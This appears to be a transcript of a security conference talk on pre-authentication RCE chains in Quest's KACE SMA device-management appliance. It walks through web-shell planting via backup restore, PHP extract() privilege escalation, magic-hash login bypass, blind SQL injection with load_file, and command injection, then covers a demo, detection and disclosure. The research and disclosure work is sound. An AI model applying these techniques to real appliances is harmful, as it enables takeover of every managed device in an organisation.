 today we are having the pre-auth RCE chains by Jeff Hoffman. I've got a couple of announcements before we get started. Please, everyone, continue to wear your masks while you're inside, and please don't congregate around the walls, around the outside, just come in and find a seat. If you want, like, come up a little closer, that'd be great. Here's Jeff. Hi. Thanks for coming to my talk, pre-auth RCEs on Case SMA. Today I'm going to be going over what Case SMA is, as well as the interesting attack service of the product, the vulnerabilities that I found, how I conducted my research, and I have a full exploit and demo to share with you at the end of the talk. So who am I? My name is Jeffrey Hoffman. I'm a security engineer at Neuro. I have a background in web and desktop apps as well as cloud and reverse engineering. I love to do security research and exploit dev in my free time, and anything else that you might need to know about me if I'm willing to share it is on my website. So what are MDMs? MDMs stands for mobile device management, and they're typically appliances used by IT to manage corporate devices like laptops or workstations. The way they usually work is they'll install a privileged binary, usually referred to as an agent, on whatever workstation you want to manage. And that agent is going to phone home to the MDM, pick up jobs to run, run them, and report back the status of those jobs. And so the jobs can be anything. They need to run as root or system because sometimes those jobs require those privileges. For example, installing a certificate authority. But really, they're pretty versatile. That's the whole point is that IT can fully manage your device. That's good news for attackers. It makes them essentially single points of failure for an organization. You could, if you got admin access to an MDM, could do something like push out ransomware to all of the workstations at once. And more and more MDMs these days are on the internet with the rise of COVID and remote work as well as the push for people to offer software as service offerings. Some of those MDMs just have to be on the internet out of necessity. You also, so you have this great impact. You have them generally being available if you support remote work. And you have this really, really interesting scenario where if a company dog foods or uses their own MDM, you could get into their employees workstations, start pushing malicious back doors, and even reach people who only host these MDMs on-prem. So generally pretty interesting attack service. Case SMA or Case Systems Management Appliance is an MDM developed by Quest. It's written in PHP. It's a relatively popular choice for hybrid work environments where you have Windows, Linux, and Mac workstations all in the same organization. There's about 2,000 of these things on the internet including a SaaS offering that Quest hosts. And a decent chunk of these are .gov and .edu domains which implied to me that you might have a lot of very interesting PII readily available if you were to compromise something like this. So in terms of what would be valuable, admin access is really the end all beyond for these types of appliances. Every vulnerability that you find is more of a means to an end to get admin because at the end of the day you don't really want to exploit any kind of vulnerabilities on the MDM itself. You want to use the intended functionality to pivot down to multiple devices at the same time. And just a little caveat for all the vulnerabilities I'm going to talk about. I didn't look at anything that would require user interaction. I felt like that was less interesting. And so I have no idea what it's out there in terms of XSS or CSER for those types of bones. So because Quest or rather case SMA is written in PHP, getting an initial unrestricted shell was my top priority. That was going to let me pull all the PHP code off the box and then I could start source review and find more in-depth vulnerabilities. And so I'm going to show you three tricks today that have generally been fruitful for me when attacking appliances. Your mileage may vary but I always try these three things. So the very first thing is just trying to break out of any restricted shells that might have been implemented. And so I just installed case, I read through the docs and there were two default users, config and netdiag. And so they both had restricted shells. Config was more of a text editor to change network settings and it didn't have an immediately obvious way to run binaries. So I moved past that pretty quickly. And netdiag did have a more typical restricted shell. So I gathered all of the binaries that you could run, ran them through GTFO bends which is a website that collects shell breakouts. And the only thing that I found was this ARP-F partial file read which wasn't super useful for my case because I wanted to read full PHP files, not partials. So this, that first trick didn't work. This second one is going to sound a little tongue in cheek but a way that I always try to get my unrestricted shell is to look for post-off RCE. And the nuance here is where that post-off RCE can usually be found. Typically appliances, not just MDMs, want to have some sort of backup and restore process. That way you can support migrating to a new appliance if you need to or just generally backing up what IT has already set up, right? But the issue is a lot of times those backups and restores are implemented as holistic backup and restores. And so if they include anything important in them like maybe a binary or a very important config, if there's no integrity check on those backups, you're going to be able to overwrite it. And from there it's context dependent usually but the trick is just looking for important things in backups. And so in the case of case there was the web route actually included in the backup. And so my first unrestricted shell came from just planning a web shell in a backup and restoring it immediately. So I got access as www, which was definitely great. It was a good start. This is, you know, not to beat up on quests, this is just a really hard problem to solve. You have, you know, the desire to make your backups as holistic as possible. It's generally hard to sanitize those backups. The integrity check is probably the way to go. But it just generally is going to be a fruitful attack service for those reasons, combined with the fact that you almost always need admin on the appliance to trigger this functionality anyway. And the separation of privileges between being an admin on an MDM and being able to get RCE on it is, you know, almost non-existent. The admin is the more important feature. And so RCE is www is definitely a great start. But ultimately you're going to want root to poke around a little more invasively. And so from here I could have either looked for privilege escalation or, and this is what I actually did, is try my third trick. And this third trick is essentially the same as the backup and restore process, but you don't go in through the application. It revolves around the fact that if you own the appliance, you own the virtual machine's disk, you can simply unmount that virtual machine disk, mount it in a new virtual machine of the same operating system, and start overriding whatever you want on that file system. And so I targeted NDSH, which was the name of NetDiag's custom restricted shell, and I compiled a setUID wrapper around BNSH, set the setUID bit on it, CH owned it as root, and I overwrote NDSH with it. Once I logged in as NetDiag, I was given a root shell right from the getco, and from there I could do all the really nice tabs like adding a new user that's root equivalent, enabling SSH, and generally I was able to be a little bit more invasive. So the first thing I did was gather all of the PHP code, and I also took this opportunity to just orient myself in the application. The logs directory was incredibly helpful, just prepping for strings that I saw in source, and using that to validate assumptions. But just with root level access, you know, there were no files that could hide, I could read everything, so I just spent some time trying to figure out how the appliance actually worked. In terms of attack surface, only 80 and 443, so the web UI, were open to the world by default. There was this high end port that was exposed during the update process, but it was just a Golang binary that served a update log, so not particularly interesting. And so because only the web UI was exposed, I could gather all of the unauthenticated attack surface by making a word list and just using Go Buster to brute force over all of the files that were accessible in that web route. You filter out the 403 forbidden, and you have a pretty good list of where to start. And that approach is great. It was definitely a great start, but it's a little naive, and you can do better by looking for the actual requirement statements of the authentication checks. And so in this example, at PHP, the way it imports code is through the key word require, and you can imagine auth.inc includes all the auth checks, but generally you're looking for the imported file, and you're filtering out all the files that actually include it. And so that will give you an actual source of truth rather than this Go Buster method. The list generally didn't differ that much, but this is just a little bit more reliable, and you should note that it's not going to include recursive inclusions. So you can imagine auth2 includes auth. You're going to have to grab for things that don't include auth2 or auth1. So at this point, I had a post-auth RCE, and I started thinking about whether or not an authentication bypass would be enough. And unfortunately, I didn't feel like it would be at the time. My post-auth RCE already required admin privileges, so that was already goal. It wasn't really an extra vulnerability that I wanted, and that meant that I would need a post-auth RCE with less privilege requirements, or I would need to find a privilege escalation within the app. So I went hunting for those types of vulnerabilities, and there were calls to extract all over the application. And if you're not intimately familiar with PHP, that's okay. A screenshot of the extract docs can be seen on screen. There's this big warning that says, do not use extract on attack or control data, and that is because extract, by design, overwrites the symbol table in PHP. What that means is you can specify an attacker-controlled key and an attacker-controlled value, and if those are passed into a call to extract, a variable with the attacker-controlled key name will be instantiated, and it will be set to that attacker-controlled value. So that's generally pretty useful. You can define whatever variables you want, but the cooler thing is that you can redefine variables that already exist. And so two really great targets to go after are the globals, because they'll always be there, and the session variable, because that's how PHP tracks your identity. So an unauthenticated call would let me set all of my session variables to whatever I wanted, essentially creating a full session from nothing. So that would have been a great one-shot vulnerability to have, but unfortunately I couldn't find any unauthenticated uses of extract. Luckily, though, it was still called in about 100-plus places with attacker-controlled data throughout the app, so tons of different exploit strategies. One cool one was you could bypass 2FA, because your 2FA configuration was set within your session, so you could log in, hit an endpoint, and say you didn't have 2FA, and you're good to go. The thing that's going to be really useful for this talk, though, is the direct privilege escalation. And so in case they defined all of their permissions as just integers, and they mapped to different roles, and so exploiting, or privilege escalating, rather, is as easy as going to a vulnerable endpoint. So I'm picking on maillist.php and setting your KB permissions to whatever number you want. And you can just declare yourself a global sys admin, and you are good to go, and you can start using all the admin functionality. Now, I didn't pick maillist.php at random. This is a pretty interesting file. I looked all over at these calls to extract for, like I said, ones without authentication checks, and I didn't find any of those, but maillist.php had a lighter authentication check than normal. And so it's not important you understand what the full authentication check looked like, but what is important is that you understand checking for KB valid user session was one of many checks that Quest intended to do. So this is just an ad hoc partial authentication check that essentially meant you logged in, not you had a fully realized session. And so that just lowered the bar ever so slightly in terms of the kind of authentication bypasses that would be useful. Now, I have post-auth RCE. I have a great privilege escalation, multiple endpoints in the app, so I'm going to be able to hit admin and even trigger that RCE. So looking for bypasses or authentication bypasses is now worth the time. So here's the first one I found. Essentially, Quest appeared to use MD5 and SHA1 password hashes once upon a time. That was no longer the case when I looked at the app, but they did have to leave the legacy comparisons in so that users who had created their account when the password hashes were MD5 or SHA1 could still log in. Essentially, you'd log in if one of these checks succeeded. They would rehash your password and it would be rotated. And so what that code review told me was there wasn't going to be any MD5 hashes or SHA1 hashes readily available, but if there was one, say an old account that had never had their password rotated, the loose comparisons there in that code block on screen was significant. If you're not intimately familiar with PHP, that's okay. It's dynamically typed language and equals equals is the loose comparison operator as opposed to other languages where you would normally assume it's a strict comparison. And so what that means is PHP is going to try to infer the actual type of the variable it's looking at, and that's typically referred to as type-draggling. It'll try to coerce the value to a bunch of different types, and if one of those checks succeeds, the entire loose comparison succeeds. And so there are three examples on screen right now. Those two bullets in red return false, but the bullet in green returns true. And that is because in PHP, well just generally, a number and an E is interpreted as scientific notation for exponentiation. And so when you have a hash or a string that starts with zero E and then has all numerals after it, during that type-draggling process, PHP will interpret that as zero to the power of something, and zero to the power of anything is zero. So if you have two strings that aren't actually equivalent strings but are of that magic hashing format, when you do a loose comparison between those, it'll evaluate to true. And so I said that there probably wouldn't be any, you know, SHA-1 or MB5 hashes in the database, but I needed to go and check anyway. So rather than recovering the root password, I just restarted the database without authentication locally and added a root equivalent user so that I could poke around. And when I started looking at the actual password hash table, it confirmed my code review. There were these new actually salted hashes for passwords. And that meant to actually test. I had to add a new user and fake them having an old MB5 or SHA-1 password hash. And so I planted this zero E 333 value. I have no idea what could possibly hash to that value, but it is of the magic hash format. And so to test, I used a precomputed value whose MD5 hash is going to, the output is going to be another magic hash. And the hunch was that when those two things would be compared, it would evaluate to true and I could log in. And so in practice, after I planted that magic hash, I just submitted the precomputed value as my login password. The hashing went through. And you can see in the location redirect, I wasn't kicked back to the login screen. It actually took me to a dashboard. So I successfully authenticated. And just to confirm my code review, I went and looked at the table afterwards and the password migration did actually happen. So this vulnerability effectively amounts to a password change. Now, this is super cool and definitely an authentication bypass, but it has a few issues. So first off, you have to get lucky. There's no way to control what somebody's password hash is going to come out to. And so you're just hoping that whatever someone has submitted will somehow hash to this magic hash value. There was one interesting code path that made this attack a little bit more plausible. Essentially case they supported importing your entire user directory from LDAP. And how this seemed to work in practice was you would point it at LDAP, all your users would get imported, but they were imported as unprivileged accounts. And it seemed like what you were supposed to do was give the accounts that actually were supposed to access this app privileges manually. But during that import, the password hashes were actually set to MD5 values. And you're importing your entire user directory, so not only do you have one MD5 value, you have tons and tons of these unactivated accounts. They don't have any permissions, but because of that ad hoc authentication check and mail this .php, that doesn't actually matter. So when you log in as one of those deactivated accounts, this is what you'll actually see. You get kicked out to the login screen and it says access denied. You are not authorized to access any of the tabs. And even when you look at the request and response, it appears like the login fails. You can tell this because it's resetting your Kbox ID, which was the session cookie. And so normally when an app does that, it's saying like, hey, restart the authentication flow. This did not work. But if you look at the session on disk, it actually has KB valid user session set. And so you can resubmit that old session ID, hit mail this .php and privilege escalate to admin just from these unactivated or unprivileged accounts that were never really supposed to be used. And so this is definitely a fully plausible attack scenario, but like I said, you have to get lucky. It requires them actually using this feature. And the odds aren't even that good if they are. So I moved on looking for something better. The second authentication bypass I found was definitely slightly better in terms of exploitability, but it was a non-default feature. And so Quest doesn't make just case SMA. They make a bunch of different appliances. And one thing that they wanted to support for all of these is this magic login. And so you would pair two Quest appliances together and they would generate tokens for each other that were redeemable at the other appliance. And so when you are in one appliance, you click on a link generated for you. You've redeemed your token and you are logged in as your user, but in a different appliance. And the token generation can be seen on screen in bold. It is an MD5 hash, but there's no magic hashing going on. The real issue is that the input is essentially guessable. So unique ID is taking two arguments. The first is prefix. The second is more entropy. The more entropy does not actually matter for this attack. But the prefix is generated by microtime. It's just the current time of microseconds. It's definitely not a secure, you know, random value to use. And when you look at the unique ID docs, you see that most of unique IDs entropy also comes from the current time in microseconds. And so you essentially have the randomness coming from two calls to a totally guessable value. And the attack in practice would look like you brute forcing a bunch of different outputs for these two microtime calls and generating your tokens with the MD5 hashing. But you would just continue to iterate until you guess the right token. And so this is definitely more exploitable than in practice. There's no luck involved. But it's non-default. No one's forcing anyone to buy two quest appliances. And even if you have tons of quest appliances, no one's forcing you to link them and actually use this functionality in the first place. So those are two of the three chains that I wanted to cover. They're not so great. They're really not reliably exploitable in practice. But the third one I'm about to cover is. So those are the only authentication bypasses that auditing the user attack surface turned up. And after I was done with that, I turned to the agent communication. My hope was maybe authentication was implemented a little bit differently and I could find some more authentication bypasses there. And I actually landed in this file .php. And there was clear command injection, but it was behind this ad hoc authentication check where you had to submit some secret parameter called serve. And so the command injection should be clear. Org ID is attacker controlled. It's taining temp location, which taints zip name, and then both of those variables are used in the call to exec. So I started digging into how serve was created. It was the only thing stopping me from triggering the command injection. And as it turns out, serve is the hashed serial number of the appliance. It's essentially meant to be a bootstrapping secret for agents that I guess just wasn't unique to every agent, but that's a little bit easier than making a unique username and password or doing something else. So it was like that for convenience. But it was also good news for me. The serve parameter was the SHA-256 hash of the serial number. And so an unauthenticated LFI would work because the actual function that retrieved the serial number just read it from disk. So if I could retrieve the serial number like that with my LFI, I would be able to calculate serve myself and I would be able to exploit the command injection. Unfortunately, depending on the installation type, there was one, the serial number would be stored in one of three places. And one of those file names had the MAC address of the device appended to it. So I would need a way to leak the MAC address of the device before I could actually exploit this in the worst case. Luckily for me, when you log in, the MAC address is presented to you. And that contents of the message is actually stored in Etsy issue, which is world readable. And so if you had an LFI, you could read Etsy issue, pull the MAC address, then you could read that file name in the worst case, pull the serial number, and calculate serve to bypass authentication. Now knowing that, I went around and audited high and low for unauthenticated LFIs and I came up empty handed. So I took a step back and started thinking about what I could use as an LFI equivalent. And as it turns out, the SQL queries made by the app were being made as the root user, which meant that if I could find SQL injection, I would be able to use directives like load file to read contents from disk. And depending on the SQL injection quality, I would be able to use that in the same way I'd use an LFI. So a single LFI was all that was needed and this code block on screen is actually in the same file as the command injection, but it comes before serve, or the check for serve rather. So technically it's unauthenticated. And it's not important that you remember exactly what's going on here. What is important is that you remember validate org comes first and validate agent version comes second. If either of those queries fails, the app 404s and it'll exit immediately. So validate agent version has clear SQL injection. You can see org ID is just directly placed in the SQL query string, but validate org is going to come first and unfortunately org ID is properly parameterized there. So when I was doing code review, this looked unexploitable. Org ID is the ones stored in the database are stored as integers and so I can't make an SQL injection payload out of integers. Luckily for me though, I was just spraying around some testing payloads to actually locate the relevant logs and I had accidentally hit the SQL injection invalidate agent version. And I didn't really understand how that was even possible, so I had to work backwards from this. But what had happened was MariaDB actually type juggles. And so this is in their docs. It's some convenience feature for strings with differing units. An example use case of this feature is on screen. It's inferred that the developer writing this query really does want to operate on these two values with differing units and so if it sees a string that starts with numerals and then contains non-numeric text, it interprets that as units and it will just drop them. And so the validate org query looks exactly like this. If you just append the SQL injection payload, it will get dropped. And MariaDB happily treats that as just a one and the query actually returns successfully. So pretty cool. So that means that we can actually hit the SQLI invalidate agent version but there are still a few issues that we have to work around. So first off, SQL responses aren't visible. Secondly, base name is called on org ID, which means that we can't directly pass in paths of the files we want to read like etsy issue because the payload will be truncated. And finally, org ID has to actually be valid SQL and command injection because we need validate agent version to succeed when we actually trigger the command injection. So to start working around that, the first thing I did was create a blind SQL oracle and I essentially abused the behavior of that immediate 404. So when queries fail, the app 404s, when queries succeed, the app eventually returns a 200 and so just by looking at the HTTP response codes, you could infer the outcome of the comparison in the SQL injection. Now that's definitely useful but we still have to get around that second constraint of base name being called and so the way that I did that was just using the concat directive and so all this is nested within a call to load file but 0x2f is the ASCII character or the integer value for ASCII forward slash and so that output of the concat call will result in etsy issue which then could be passed directly to load file. Now I still need to pull out single bytes to make my oracle useful and so the way that I chose to do that was dynamically rather than hard coded offsets and so I used locate with load file in order to find the starting address of the actual things I wanted to brute force and then I used substring to pull out a singular byte and then I could just brute force the MAC address and serial number because they were alphanumerics, so relatively small search space. And the full strategy as I just described it will work. You can use the SCLI to read your two local files, calculate serve and then you can trigger your command injection. We just have that last pesky issue of needing a payload that is valid SQL and valid command injection and so the way that I got around that the payload can be seen on screen. Essentially the semicolon delimits SQL. I used hyphen hyphen which is a comment in MariaDB. You can't use the pound time because it'd comment out your command injection and then the dollar sign and parentheses should be pretty recognizable and to get around base name for payloads I just wrapped it all in base 64. And so from here I could trigger my RCE unauthenticated as www but I really wanted root just because I thought it would be more fun. And so I ripped this methodology straight from the OSCP. I just looked for custom things running as root and there were a few PHP files that I immediately started looking at because they were going to be really easy to audit. And so one of the things that I looked at was called KB server. The long and short of it was it listened on a world writable Unix socket and it was listening for commands in the form of command, argument and argument. And so there were a bunch of different handlers or commands that you could run. One of the interesting ones is shown on screen now and it does essentially what the name of the command applies. It takes an attacker controlled source, moves it to an attacker controlled destination and then for good measure CH owns that is www. And so that is relatively straightforward logical privilege escalation. You could override an important binary or some important file but I chose to abuse the command injection that was in the actual implementation of the handler. So here's the current state. The two chains on the right and left aren't really reliable or so great but the middle one is and you can execute commands as fruit from an unauthenticated perspective. And so now I have a demo to show you. Oh great, it's already up. All right, so the first thing it does, the first thing it does is check that it can trigger the SQL injection. That's so it knows if the appliance is vulnerable or not and right now it's just using the techniques with the SQL I to leak the MAC address. After that it starts leaking the serial number from the file in that worst case which is what was used in virtual box installations. And so kind of interesting to note that the timer that you see spinning is actually getting spun every time a response comes in and you can see it hang on the successful guesses because case does a little bit more processing. So even if we couldn't have made this Oracle we could have done a timing attack or maybe some other technique to leak this data. And so after this finishes you're going to see it run commands as root. It's actually going to set up a set UID bash shell so that I don't have to go through two command injection contexts. It makes running payloads a little easier. And it's going to happen really really quickly. It's going to make a new admin, make a script that gets pushed out to all of the devices in the org. And that script is pretty mundane. It's just going to change the background to that cowboy cat picture. But it happens just this quickly. And in a few seconds you'll see that device that I'm running this payload on top of. It's registered in my org and it'll pull down that job, run it and the background will change. All right. And you know, obviously, thanks. So obviously a real attacker wouldn't do that. They would probably do something more malicious like deploy ransom ware. But hopefully that gets the point across. And so I should say the full exploit for that is available on my GitHub. It was also shared with the speaker materials. I defanged the exploit script a little bit. It didn't seem so appropriate to release something that just like works like that out of the box. But it does run commands as root. And so it's enough to demonstrate that these vulnerabilities do work like this in practice. Now in terms of detecting this, the general access log for case is actually good enough to catch all of this because org IDs are supposed to be integers and the initial SQL request is, our SQL injection request is just a get. So you can filter for any org ID that's not strictly an integer and you'll be able to know if the attack had actually happened. Now I have some closing reflections that I want to share with you. So first off, as much as I wish I could say this was new and novel work, it actually wasn't. Some firm called Core Security reported very, very similar vulnerabilities if not the same ones in 2018. And so the SQL I was reported and I never got to see this unpatched code. But my best guess is the fix for that was actually just parameterizing org ID in the first place. And that totally makes sense to me. I through code review missed that this would be exploitable too. So I could see how even the security researchers request, they all could have missed that. I definitely would have missed it too if I didn't get lucky. But it just goes to highlight the importance of explicit versus implicit sanitization. If you had done the explicit sanitization, this weird convenience feature MariaDB would have never have mattered. As far as the RCE, I'm a little bit more confident that this was new because the payload that they had shown and described didn't include this MSI parameter that was required to hit the vulnerable code path for my command injection. And so regardless of whether or not it was a reintroduction or maybe a regression, it was probably also assumed that org ID was never going to be attack or controlled like that. Again, that convenience feature in MariaDB really bit the developers in the butt. So definitely explicit versus implicit sanitization is the way to go. You just remove so much unknown unknown when you do that and effectively guarantee that you'll never have to worry about it. But both of these vulnerabilities together also for me at least highlighted the importance of defense in depth. I never would have been able to read files if SQL queries weren't being made as root and the exploitation would have stopped there, the command injection would have never been reachable. And so here's the total timeline for the disclosure. I contacted them on 420 and the very next day I had a meeting with the Quest team to explain essentially everything that I found. They were pretty concerned and responsive and they released a hot patch relatively quickly. And we actually mutually chose together to withhold the CVEs. So I haven't talked about any of the CVE numbers. They are out now, but I didn't get a chance to put them in my speaker materials because they were due a little bit earlier than the CVEs were released. But the patch was out on 511 and they sent very, very strongly worded communication to their customers consistently urging them to patch, patch acceptance was relatively high even in those first two weeks. And the CVEs were withheld essentially because the app's PHP. So patch diffing is almost trivial and it wouldn't really have been fair to those customers to release this very critical CVE and have the motivated attackers patch shift quicker than they can schedule a regular patch. And finally I just want to give some credits and thanks. So again it really pains me to say this, but credits to core security for beating me to this. I wasn't guided by their research. I didn't know about the CVEs until after the fact. Probably my fault. I would have saved myself some time if I had found existing CVEs before I'd started looking into this. And credit to Michael Spasek for making that pre-computed magic hash value that I used. And then finally I just want to thank Neuro which is the company that I work on now for giving me the opportunity to do such interesting and impactful work. And then I just want to give a huge thanks to John Novak who's a former co-worker at Pretorian. He taught me a ton about appliance hacking, showed me some of those neat tricks that I got to share with you today. And by extension, thanks to Pretorian for just being a great environment to learn in. So I will take any questions. Thank you for coming to my talk.